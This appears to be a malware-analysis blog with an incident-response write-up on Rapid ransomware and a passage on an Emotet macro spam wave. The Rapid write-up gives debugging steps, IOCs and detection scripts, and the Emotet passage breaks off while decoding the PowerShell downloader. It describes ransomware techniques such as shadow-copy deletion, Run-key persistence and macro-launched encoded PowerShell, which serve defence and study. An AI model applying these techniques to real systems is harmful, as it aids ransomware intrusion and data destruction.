Mr. Jones: Just a collection of CTF or work related write-ups. If you want you can contact me on twitter: <a href="https://twitter.com/Mr__J____">https://twitter.com/Mr__J____</a><br />
<h1>
Quick Overview of new Ransomware Rapid</h1>
Published 2018-01-25 by Mr. Jones<br />
<br />
Yesterday I received a call about a system being infected with some kind of ransomware. I was told that files were encrypted with the file extension .rapid. A quick Google search revealed a post about this kind of ransomware from 2 days ago: <a href="https://www.bleepingcomputer.com/news/security/rapid-ransomware-continues-encrypting-new-files-as-they-are-created/">https://www.bleepingcomputer.com/news/security/rapid-ransomware-continues-encrypting-new-files-as-they-are-created/</a><br />
<br />
As the caller was unable to provide me with a sample at this time, I googled for Rapid ransomware samples (search terms: rapid ransomware twitter) and found this tweet <a href="https://twitter.com/demonslay335/status/948210920228032512">https://twitter.com/demonslay335/status/948210920228032512</a>, which contained VirusTotal URLs to samples and also a link to a Russian blog post: <a href="https://id-ransomware.blogspot.com/2018/01/rapid-ransomware.html">https://id-ransomware.blogspot.com/2018/01/rapid-ransomware.html</a>.<br />
<br />
A few minutes later I got a second call and told the customer to check the %APPDATA% folder for a file called "info.exe", with success. They provided me with this sample (<a href="https://www.virustotal.com/#/file/a688e98fd7cece3f5dbb88bfab0d500a4a109e6759a6f7cb26134c80ce79bb05/detection">https://www.virustotal.com/#/file/a688e98fd7cece3f5dbb88bfab0d500a4a109e6759a6f7cb26134c80ce79bb05/detection</a>), which I decided to take a look at. As time was of the essence, I only had about an hour to check the capabilities of the ransomware, and I wanted to share my approach.<br />
<br />
<h2>
Step 1 - Running the sample</h2>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFCKp3gjPOXzUFqb1k14gX2F0L2upljrA-c3xZW-2y7K4_jNnhpsP3J8UJ1A5PNl6FzIOxOBii3gydKH7SlwFoVXON1jjNGiUJA3R2DSxTX-5zvaAHaTgrTVvSEA7xkoJwqOeBgdF2yr92/s1600/procmon.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="462" data-original-width="1388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFCKp3gjPOXzUFqb1k14gX2F0L2upljrA-c3xZW-2y7K4_jNnhpsP3J8UJ1A5PNl6FzIOxOBii3gydKH7SlwFoVXON1jjNGiUJA3R2DSxTX-5zvaAHaTgrTVvSEA7xkoJwqOeBgdF2yr92/s1600/procmon.JPG" /></a></div>
<br />
<div>
As usual I checked hybrid-analysis for the given sample, which provided me with some basic information about it, especially about deleting shadow copies and terminating common database processes. I ran the sample and monitored it with Process Monitor and Process Explorer from Sysinternals. I noticed some basic persistence and the capability to encrypt network drives, nothing unusual.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyGztUrqH9DolHJFRD_nAUMPadk-0AAVkPXN4dkm8fKe4SVcSBgfT1wtZ7tdQbnuiCdL2upNc8uweGNYY7IyUBPzggnfkGpDY4d-5iaryUe6deLX75DWKUSZnQyIbpxnSaBmXSTAmd0Gbi/s1600/procmon2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="653" data-original-width="705" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyGztUrqH9DolHJFRD_nAUMPadk-0AAVkPXN4dkm8fKe4SVcSBgfT1wtZ7tdQbnuiCdL2upNc8uweGNYY7IyUBPzggnfkGpDY4d-5iaryUe6deLX75DWKUSZnQyIbpxnSaBmXSTAmd0Gbi/s1600/procmon2.JPG" /></a></div>
<h2>
Step 2 - Basic overview in IDA</h2>
<div>
I opened the executable in IDA and got presented with an unusual looking WinMain function.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfTaNdV1w5ElAfpLUfSvEwdtlvH1bFXCYHo1FAeFh8nMdGPpPTiaiU1sbbsCB9f3EwMhc8kGcfKI1hHMmdjuzakL3VKu9Tp1ZICBRgfHe6cnSSYJS5Kr85ScZ5wNryzUBSS_12NeE1Yygv/s1600/winmain.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1015" data-original-width="312" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfTaNdV1w5ElAfpLUfSvEwdtlvH1bFXCYHo1FAeFh8nMdGPpPTiaiU1sbbsCB9f3EwMhc8kGcfKI1hHMmdjuzakL3VKu9Tp1ZICBRgfHe6cnSSYJS5Kr85ScZ5wNryzUBSS_12NeE1Yygv/s320/winmain.JPG" width="98" /></a></div>
<div>
Several subfunctions were also huge and looked like obfuscation code.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDJi0czyvzFXGFz7TWx4KQovdeI1rAioQ1PAu4QBTDugqRfY5rvzJImJFY5GA53RXVKjdh08FngVqxlsQjlxiE8o0axeEHUwEOYjRWFSZALkHkgcrckJ8Ck9ZEhlhU_88BYBtUG8L-4Oms/s1600/weirdo.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="559" data-original-width="1600" height="111" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDJi0czyvzFXGFz7TWx4KQovdeI1rAioQ1PAu4QBTDugqRfY5rvzJImJFY5GA53RXVKjdh08FngVqxlsQjlxiE8o0axeEHUwEOYjRWFSZALkHkgcrckJ8Ck9ZEhlhU_88BYBtUG8L-4Oms/s320/weirdo.JPG" width="320" /></a></div>
<div>
I didn't have the time to deal with the obfuscation, so I decided to run the sample in x64dbg. I noticed a call to LoadLibrary near the end of the WinMain function and decided to put a breakpoint on it to see if any suspicious API functions are loaded at run time.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoilP7NXGIIwbQ6AXHHqqxWkZJ4zrFv5l9kgmupS_KDLCvHWf0cjqeWzCyUJCE2b-HZb9SFH9tl8JFWTY-EAfKy9dhDdy4XhZfUXldq3p8fn3-0hYLbunArM7eQr7z9g3GysjbuE57exUL/s1600/shellexecuteA.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="777" data-original-width="1436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoilP7NXGIIwbQ6AXHHqqxWkZJ4zrFv5l9kgmupS_KDLCvHWf0cjqeWzCyUJCE2b-HZb9SFH9tl8JFWTY-EAfKy9dhDdy4XhZfUXldq3p8fn3-0hYLbunArM7eQr7z9g3GysjbuE57exUL/s1600/shellexecuteA.JPG" /></a></div>
<div>
The breakpoint was hit 7 times and I noticed shell32.CryptDecrypt and shell32.ShellExecuteA on the stack. As it turned out, this step wasn't necessary and one can simply put a hardware breakpoint on shell32.ShellExecuteA (the malware seems to remove software breakpoints during execution).<br />
<br />
I thought about the hybrid-analysis results containing "cmd.exe ..." to kill known database processes. Since ransomware usually persists itself before starting to encrypt files, I had two options: either break on the resulting registry functions or try to break on shell32.ShellExecuteA.</div>
<div>
<br />
I put a breakpoint on it and continued to run the sample. When it was hit, I followed the return value on the stack and found multiple plaintext strings, so I decided to dump the process and load it in IDA.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Z7O_RtSuLkl_tS65a8FFGmRMCZybCZlNUyn2vuTVXRF4dJZsWhkOF3GSTuA1NsTCI4z2Qk_eavOBZScSMZ-id37nEXGZ2U1Aaa4MP9S7z-QlntuaFHkCj3V9qltHj7s8jDjomFFkebaI/s1600/shellexec2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="601" data-original-width="1432" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Z7O_RtSuLkl_tS65a8FFGmRMCZybCZlNUyn2vuTVXRF4dJZsWhkOF3GSTuA1NsTCI4z2Qk_eavOBZScSMZ-id37nEXGZ2U1Aaa4MP9S7z-QlntuaFHkCj3V9qltHj7s8jDjomFFkebaI/s1600/shellexec2.JPG" /></a></div>
<div>
<br />
<br />
<h2>
Step 3 - Unpacked binary in IDA</h2>
</div>
<div>
Opening the sort-of unpacked binary, I immediately checked the strings and found a couple of interesting ones, which also indicate that the malware persists itself to Software\\Microsoft\\Windows\\CurrentVersion\\Run and kills oracle.exe, sqlite.exe and sql.exe. One can also see the hardcoded info.exe name, which will be the name of the persisted file, as we will see later on.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_ohjTwDMH2Go5CMNMCYxyCZjPa_dR2OO1QEIM1V6QqzhMBGbzQoR2GZBewaGJcdtVxvhuEiANgEP56s5ZcEaCiApRtP9OA0oH2rILPDepGQW0quXscwc7YVW0TOYcVC5dcF2f3TxcBiSb/s1600/ida_strings.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="405" data-original-width="843" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_ohjTwDMH2Go5CMNMCYxyCZjPa_dR2OO1QEIM1V6QqzhMBGbzQoR2GZBewaGJcdtVxvhuEiANgEP56s5ZcEaCiApRtP9OA0oH2rILPDepGQW0quXscwc7YVW0TOYcVC5dcF2f3TxcBiSb/s1600/ida_strings.JPG" /></a></div>
<div>
I followed the ShellExecuteA return value from my debugging session and found the main ransomware function, which is quite small and similar to that of other ransomware like Crysis.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUiJM6iaPVcsMvff1k8bFyz-SBdS7tsJu0Ai9g2y7b8U2dxsszPF9gZNL48p8LeTbXh47ty2ZrDwaNRfIf_AzLu-HeZnt9sllrkSscx04iqwTNlfKeuIt0fwJwLCMlJ4s2tCOTp84EiL1L/s1600/rapid_main_function.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="724" data-original-width="1119" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUiJM6iaPVcsMvff1k8bFyz-SBdS7tsJu0Ai9g2y7b8U2dxsszPF9gZNL48p8LeTbXh47ty2ZrDwaNRfIf_AzLu-HeZnt9sllrkSscx04iqwTNlfKeuIt0fwJwLCMlJ4s2tCOTp84EiL1L/s1600/rapid_main_function.JPG" /></a></div>
<div>
There are 6 calls to ShellExecute in total:</div>
<div>
<ol>
<li>Delete shadow copies (requires admin rights)</li>
<li>This command disables booting in safe mode if I remember correctly (requires admin rights)</li>
<li>Seems to be required to run 2. on enterprise version (requires admin rights) (<a href="https://social.technet.microsoft.com/Forums/windows/en-US/30e16d16-5398-474b-b4c0-9a727a686f9a/bcdedit-set-fails-on-setting-recoveryenabled-to-no-for-default-guid?forum=w7itproinstall">https://social.technet.microsoft.com/Forums/windows/en-US/30e16d16-5398-474b-b4c0-9a727a686f9a/bcdedit-set-fails-on-setting-recoveryenabled-to-no-for-default-guid?forum=w7itproinstall</a>)</li>
<li>Kill oracle</li>
<li>Kill sqlite</li>
<li>Kill sql</li>
</ol>
<div>
Afterwards %APPDATA% is resolved, and the file itself is copied to %APPDATA% as info.exe and persisted. The malware also creates a file called recovery.txt, which is also run on reboot.</div>
</div>
<div>
<br /></div>
<div>
The function init_crypto writes the newly generated keys to HKEY_CURRENT_USER\Software\EncryptKets.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr7EvGOZ0D5I48027XwdUJrS71s-KR2s-e0G8-euCMvIhF4xPElrVIKpc-OElmVjorDVAr5XJDvg5txzYl3_tq57m5ziOcgQZgjcYspY6NBepLvtJ36_S2xmqb0pC1wFxINSVs63jAHMJC/s1600/reg_keys.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="105" data-original-width="717" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjr7EvGOZ0D5I48027XwdUJrS71s-KR2s-e0G8-euCMvIhF4xPElrVIKpc-OElmVjorDVAr5XJDvg5txzYl3_tq57m5ziOcgQZgjcYspY6NBepLvtJ36_S2xmqb0pC1wFxINSVs63jAHMJC/s1600/reg_keys.JPG" /></a></div>
<div>
The local_public_key is hardcoded into the binary in its base64-encoded form (BgIAAACkAABSU0ExAAgAAAEAAQB5HZZSge6GEPqkQTwzzugIrH3nOJHkLUsbUfm3m2bbJrLyNSM2FOQKxEMix1agNja0IgBmzzueh6nsn4ALDCD/fCwQAotsEDfnYpQDz9dKoHmMPMGCuXESkdMEiVm83PyAnJh4f4Zcq6Y1ONNmuMTfS6kTP0JUlqhM3VHWiafi+eaTL01x2kOeSupagrho+IqG6FH8Bl0weQXYpFjbxgpV3ldkKB4lf66rHFFfk93vOQhLvl2rDCg/fAMGFBIF5debBtCSi+t19biR+ze5Zau9/wd6+3Ec8DXRdpTjK7n8Q3hQouTONlY9RgjpHxLoPxsrWnyxPc6F/AUxKXkWeLW/) (also noted here: <a href="https://www.bleepingcomputer.com/forums/t/667032/rapid-ransomware-rapid-paymeme-how-recovery-filestxt-support-topic/">https://www.bleepingcomputer.com/forums/t/667032/rapid-ransomware-rapid-paymeme-how-recovery-filestxt-support-topic/</a>).<br />
<br />
The following screenshot shows the init_crypto function.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiohPkqVd2jLkpAkZ56lkkgrjIPvOJ_65Goktqm19o0AnoGkvfK0eH0x_YvCTh5Qg2126_so4NMwSP7dkpclG-0vseGS0spHQXpWz_27U1m0rEFHVcnWBuzAELbjXqTE4iW1VPtE8a-vvuh/s1600/initcrypto.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="529" data-original-width="1026" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiohPkqVd2jLkpAkZ56lkkgrjIPvOJ_65Goktqm19o0AnoGkvfK0eH0x_YvCTh5Qg2126_so4NMwSP7dkpclG-0vseGS0spHQXpWz_27U1m0rEFHVcnWBuzAELbjXqTE4iW1VPtE8a-vvuh/s1600/initcrypto.JPG" /></a></div>
<div>
<br /></div>
<div>
After initializing the crypto, the ransomware iterates over all logical drives (the drives you see in your Windows Explorer) and determines whether each drive is a network drive or not. Running the sample, it seems to prioritize network drives for encryption.<br />
<br />
The final calls after the for loop start the multi-threaded file encryption, display the ransom note (which actually doesn't work, you only see a cmd window pop up) and sleep 30 seconds, after which the encryption process is restarted in an infinite loop. This means that if you create new files while the ransomware is active, they will be encrypted after roughly 30 seconds. If you want to see the ransom note, just reboot the machine.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHm8P7RCk86ZKyJVCRpmBSc_qxmteFE0PLOe9Vpwj1z_50PUdGOrmJQBYNzOVdgDGSpEyBqIG15L4oVGA9m7a0NFGLJhG2snnw4GK1MrLCuaOkSQX1jmsL-sHDc4KaO2N-st08YZsQnsG7/s1600/ransomnote.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="817" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHm8P7RCk86ZKyJVCRpmBSc_qxmteFE0PLOe9Vpwj1z_50PUdGOrmJQBYNzOVdgDGSpEyBqIG15L4oVGA9m7a0NFGLJhG2snnw4GK1MrLCuaOkSQX1jmsL-sHDc4KaO2N-st08YZsQnsG7/s1600/ransomnote.JPG" /></a></div>
<div>
<br /></div>
<h2>
Detection using Sysinternals-Autoruns</h2>
<div>
To check whether a server or machine is infected by Rapid ransomware, run autorunsc.exe from Sysinternals in a PowerShell with admin rights by issuing the following command:</div>
<div>
<br /></div>
<div>
<blockquote class="tr_bq">
.\autorunsc.exe -a * * | grep info.exe</blockquote>
(remember to accept the EULA first)
<br /></div>
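<div>
As an added example (not part of the original post), the following PowerShell function checks a host for the indicators listed in this write-up: the dropped files in %AppData%, the EncryptKets registry key, Run-key entries pointing at info.exe, and the presence of .rapid files. It assumes an elevated PowerShell and inspects the current user's profile by default (pass -AppData to check another profile's Roaming folder); the SHA-256 is the one from the IOC section.</div>

```powershell
# Added example, not from the original post: host check for the Rapid
# indicators described in this write-up. Run from an elevated PowerShell.
# The indicators (info.exe, recovery.txt, Software\EncryptKets, the Run key
# and the SHA-256 of the sample) are taken from the post; nothing else is assumed.
$KnownSha256 = 'a688e98fd7cece3f5dbb88bfab0d500a4a109e6759a6f7cb26134c80ce79bb05'

function Test-RapidIndicators {
    [CmdletBinding()]
    param(
        # Roaming AppData folder to inspect; defaults to the current user's.
        [string]$AppData = $env:APPDATA
    )
    $findings = @()

    # 1. Files the ransomware drops into %AppData%.
    foreach ($name in 'info.exe', 'recovery.txt') {
        $path = Join-Path $AppData $name
        if (Test-Path -LiteralPath $path) {
            $f = [pscustomobject]@{ Indicator = 'File'; Detail = $path }
            if ($name -eq 'info.exe') {
                # Compare against the analysed sample; a different hash still
                # deserves a look, it may simply be a newer build.
                $hash = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
                $f.Detail += " (SHA-256 $hash" +
                    $(if ($hash -ieq $KnownSha256) { ', matches the analysed sample)' } else { ')' })
            }
            $findings += $f
        }
    }

    # 2. Registry key init_crypto uses to store the generated keys.
    foreach ($hive in 'HKCU:', 'HKLM:') {
        $key = "$hive\Software\EncryptKets"
        if (Test-Path -LiteralPath $key) {
            $findings += [pscustomobject]@{ Indicator = 'Registry'; Detail = $key }
        }
    }

    # 3. Run-key persistence. The post only shows the key, not the value name,
    #    so match on the command line instead of a fixed value name.
    foreach ($runKey in 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
                        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run') {
        if (-not (Test-Path -LiteralPath $runKey)) { continue }
        $props = Get-ItemProperty -LiteralPath $runKey
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # provider metadata, not a Run value
            if ("$($p.Value)" -match '(?i)info\.exe|recovery\.txt') {
                $findings += [pscustomobject]@{
                    Indicator = 'Run key'
                    Detail    = "$runKey\$($p.Name) = $($p.Value)"
                }
            }
        }
    }

    # 4. Cheap sanity check for already encrypted files (.rapid extension).
    $rapid = Get-ChildItem -Path $env:USERPROFILE -Filter '*.rapid' -Recurse -File `
                 -ErrorAction SilentlyContinue | Select-Object -First 1
    if ($rapid) {
        $findings += [pscustomobject]@{ Indicator = 'Encrypted file'; Detail = $rapid.FullName }
    }
    return $findings
}

$hits = Test-RapidIndicators
if ($hits) { $hits | Format-Table -AutoSize } else { 'No Rapid indicators found on this host.' }
```

Because the infection in this case came in over RDP, the user whose profile holds info.exe may not be the one running the check; the -AppData parameter exists for that reason.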
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMvGhiTDeHxmcIh9n0xyMHRE41qxqQXTAWxRcDJqwcvVos-drXuWo5manZSTkUr_3aw6CrgH9hMqvirWOp__UHV22mwsmxW2YF0L15PMYeN5Ug2cCd0-kbDHNSZzxT7s0V4qybY98Ce4cC/s1600/autoruns.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="51" data-original-width="475" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMvGhiTDeHxmcIh9n0xyMHRE41qxqQXTAWxRcDJqwcvVos-drXuWo5manZSTkUr_3aw6CrgH9hMqvirWOp__UHV22mwsmxW2YF0L15PMYeN5Ug2cCd0-kbDHNSZzxT7s0V4qybY98Ce4cC/s1600/autoruns.JPG" /></a></div>
<div>
<h2>
<span style="color: red; font-size: x-large;">Conclusion</span></h2>
<div>
The infection in this particular case happened via stolen/weak RDP credentials; the crooks just logged onto the system and started the ransomware with admin rights.</div>
<span style="color: red; font-size: x-large;">That's it for today.</span></div>
<h2>
IOCs</h2>
<h3>
Registry</h3>
<div>
Software\EncryptKets</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ5i3ZFY7wspAwuO9xDj0du5yvW5zTQnoDYrHQidxlM3Fy3-aWdbBDaud1KVgwq9L4rnt42T7IZsfJjvjdZN6HqwA49z0rraiVmqIr3axjYMAPlafo38JF9g7CgQSuqAD1repx28uf5JtS/s1600/reg_keys.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="105" data-original-width="717" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQ5i3ZFY7wspAwuO9xDj0du5yvW5zTQnoDYrHQidxlM3Fy3-aWdbBDaud1KVgwq9L4rnt42T7IZsfJjvjdZN6HqwA49z0rraiVmqIr3axjYMAPlafo38JF9g7CgQSuqAD1repx28uf5JtS/s1600/reg_keys.JPG" /></a></div>
<div>
<br /></div>
<div>
Software\\Microsoft\\Windows\\CurrentVersion\\Run</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc4f4Hcd-955wo239oV1ASMqH8RdpHaI7mqja8t5WjIufXba8xYhkK3Hmg2svKcVR5oXWggkW3NDFbtWolwwt_-OdiK0FvHYPMZ6nMUGeaOOMu7M9EYEx1wz3yrw51yQY1xTI8HbReB4s1/s1600/autostart.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="87" data-original-width="558" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhc4f4Hcd-955wo239oV1ASMqH8RdpHaI7mqja8t5WjIufXba8xYhkK3Hmg2svKcVR5oXWggkW3NDFbtWolwwt_-OdiK0FvHYPMZ6nMUGeaOOMu7M9EYEx1wz3yrw51yQY1xTI8HbReB4s1/s1600/autostart.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<h3 style="clear: both; text-align: left;">
Files</h3>
<br />
<pre>%AppData%\info.exe
%AppData%\recovery.txt</pre>
<h3>
Ransom Note</h3>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEKRvfgG93hitVlGjm4wMvgbp6KQ3bT54a3WS-FwWS2P3IZyjfP-lcEKeEFqMSP6aPiKODPwUObu61ElGoAiwaPxZqogCdtFWVgdQWYeT-DRncyZCqBCi6ggLGNjsnaAAWgy9xmw3RMsIG/s1600/ransomnote.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="620" data-original-width="817" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEKRvfgG93hitVlGjm4wMvgbp6KQ3bT54a3WS-FwWS2P3IZyjfP-lcEKeEFqMSP6aPiKODPwUObu61ElGoAiwaPxZqogCdtFWVgdQWYeT-DRncyZCqBCi6ggLGNjsnaAAWgy9xmw3RMsIG/s1600/ransomnote.JPG" /></a></div>
<h3 style="clear: both; text-align: left;">
Public RSA Key (base64 encoded)</h3>
<div style="text-align: left;">
BgIAAACkAABSU0ExAAgAAAEAAQB5HZZSge6GEPqkQTwzzugIrH3nOJHkLUsbUfm3m2bbJrLyNSM2FOQKxEMix1agNja0IgBmzzueh6nsn4ALDCD/fCwQAotsEDfnYpQDz9dKoHmMPMGCuXESkdMEiVm83PyAnJh4f4Zcq6Y1ONNmuMTfS6kTP0JUlqhM3VHWiafi+eaTL01x2kOeSupagrho+IqG6FH8Bl0weQXYpFjbxgpV3ldkKB4lf66rHFFfk93vOQhLvl2rDCg/fAMGFBIF5debBtCSi+t19biR+ze5Zau9/wd6+3Ec8DXRdpTjK7n8Q3hQouTONlY9RgjpHxLoPxsrWnyxPc6F/AUxKXkWeLW/</div>
<div style="text-align: left;">
<br /></div>
<h3 style="text-align: left;">
File Hashes</h3>
<br />
<div>
MD5:<span style="white-space: pre;"> </span>a5c1a9659108b23aa6564a4e4e2d8e83</div>
<div>
<div>
SHA-1:<span style="white-space: pre;"> </span>39a87293f440221581f18708befe1860cdd3822c</div>
<div>
SHA-256:a688e98fd7cece3f5dbb88bfab0d500a4a109e6759a6f7cb26134c80ce79bb05</div>
</div>
<h1>
New Emotet Spam Wave 24.8.2017</h1>
Published 2017-08-30 by Mr. Jones<br />
<h2>
Background story</h2>
<br />
On Thursday multiple customers contacted me about emails from business partners or colleagues that contained scans or invoices. The emails themselves weren't really well done, but most customers were afraid of having been breached because it looked like someone from within the company had sent them the mails. I started with a quick Google search and could calm them down immediately because I found several similar-looking emails.<br />
<br />
You can find example emails here: <a href="https://vorsicht-email.de/beitrag/2017/08/24/scan-27511149471vorname-nachname-von-ufabaeckereiufafabrik-de-medicicasadicurafratesole-it-oder-rechnung-mjb-921-kd0727-vorname-nachname-von-infoaws-praezisionstechnik-de-nikolovmatstar-b/">example mails (German)</a><br />
<h2>
Stage 1 - Macro Word Downloader</h2>
I noticed that each email contained a URL behind which was a download of a Word document. Opening the document shows the following image, which contains instructions on how to enable content and macros.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCTtFNiRlZvN8tj4xKHOo3XkepKeDlhgeUHavTiAnzR24Jen6CyUPCSvwrz8AknDudPln9TJc8wF0WdH6f5HNe7jKTdkFAVnUfzqPESU8AZjbDFW09VMS6J9hY9tLfu-safmqas0k3QmKs/s1600/word.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="409" data-original-width="812" height="322" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCTtFNiRlZvN8tj4xKHOo3XkepKeDlhgeUHavTiAnzR24Jen6CyUPCSvwrz8AknDudPln9TJc8wF0WdH6f5HNe7jKTdkFAVnUfzqPESU8AZjbDFW09VMS6J9hY9tLfu-safmqas0k3QmKs/s640/word.JPG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">word macro dropper</td></tr>
</tbody></table>
<br />
<br />
One of the first steps, after simply enabling the macros and monitoring the network traffic, is to open the built-in VBA editor and try to debug the embedded macros. I noticed that the macros aren't password protected and that the document contains an autoopen function. The autoopen function calls another function which does all the important work. (I noticed this by quickly stepping through it and monitoring network connections.)<br />
I added a few Debug.Print statements and could quickly figure out that the macro creates a wscript.shell object to execute a base64-encoded PowerShell command. The next figure contains the main macro function with a few deobfuscated strings.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUJnWOyZAJ4eR4nrpvLzwslHgud5z74Z0EFGgMF8drzRevSNYZAZ4il8zXXjgSk7BDvxWR6JweFpDlzxL8ya4FWe1-XIdKZmGBSNjUuCWLAHR1AKfioIkoAyAGrFLW8KxLKWy9GzFkd1GJ/s1600/cleaned_macro.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="341" data-original-width="1383" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUJnWOyZAJ4eR4nrpvLzwslHgud5z74Z0EFGgMF8drzRevSNYZAZ4il8zXXjgSk7BDvxWR6JweFpDlzxL8ya4FWe1-XIdKZmGBSNjUuCWLAHR1AKfioIkoAyAGrFLW8KxLKWy9GzFkd1GJ/s1600/cleaned_macro.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Partly deobfuscated macro</td></tr>
</tbody></table>
<br />
<br />
The next step is to analyze the PowerShell and try to extract some IOCs.<br />
<br />
<h2>
Stage 2 - Base64 encoded powershell</h2>
The next step is to base64-decode the PowerShell command to see what it does:<br />
<br />
<br />
<i>[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("JAB7AH..."))</i><br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPmkissMzn3xaXRQ3e06hpSAroTthHGfYpZtkX1XCf102hhpm2g2I7qo35l-37sug0ICQ_rc_bg0HysBlDbCSq4mGTpZ7nozFYhP6sWqEpXycFIhOpxzm6muGyQzJULO24L1KhAzxojmCT/s1600/uncleandedbase64decpowershell.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="176" data-original-width="990" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPmkissMzn3xaXRQ3e06hpSAroTthHGfYpZtkX1XCf102hhpm2g2I7qo35l-37sug0ICQ_rc_bg0HysBlDbCSq4mGTpZ7nozFYhP6sWqEpXycFIhOpxzm6muGyQzJULO24L1KhAzxojmCT/s1600/uncleandedbase64decpowershell.JPG" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">base64 decoded powershell</td></tr>
</tbody></table>
<br />
I reformatted the PowerShell a bit and dumped variables using Write-Host. (Info: when a variable is declared like ${PA`TH}, the ` gets ignored, and one can simply use Write-Host ${PATH} to get the content.)<br />
This shows an array of 5 URLs the script tries to download from.<br />
